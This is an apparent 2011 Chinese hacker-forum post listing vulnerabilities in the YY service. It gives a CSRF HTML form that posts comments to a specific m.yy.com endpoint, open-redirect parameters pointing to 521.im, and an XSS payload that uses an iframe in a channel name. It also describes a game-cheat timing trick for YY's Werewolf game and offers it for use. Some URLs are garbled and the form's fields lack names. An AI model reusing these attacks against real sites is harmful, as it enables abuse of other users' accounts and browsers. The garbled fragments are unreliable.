YY多处漏洞(url跳转&CSRF&路径&XSS&杀人夜bug)
# 作者:B0mbErM@n
# 时间:2011-01-27
################################################
#
[X]csrf留言*要cookie有效时才可用,抓包action/category_id/uid,其他功能也存在csrf
<form action="http://m.yy.com/zone/8666086/p_addComment.action" method="POST" onSubmit="return validate(this)"><br>
<input type="text" value="内容"><br>
<input type="text" value=""><br> <input type="text" value="17505496"><br>
<input type="text" value="17505496"><br>
<input type="submit" value="确定提交"><br>
</form><br>
<body></body>
#
################################################
#
[X]URL跳转
jsp?url=http://521.im">?url=http://521.im
#
################################################
#
[X]登录后URL跳转
?redirect=http://521.im
#
################################################
#
[X]爆路径

#
################################################
#
[X]频道名为<iframe src=http://521.im>打开
?module_name=control
#
################################################
#
[X]杀人夜Bug
在本轮最后一个人说完话交麦的同时点畏罪自杀,则执行平安日
仅限杀手,平安日中任何人不可投票,该方法机率不稳定,慎用
#
################################################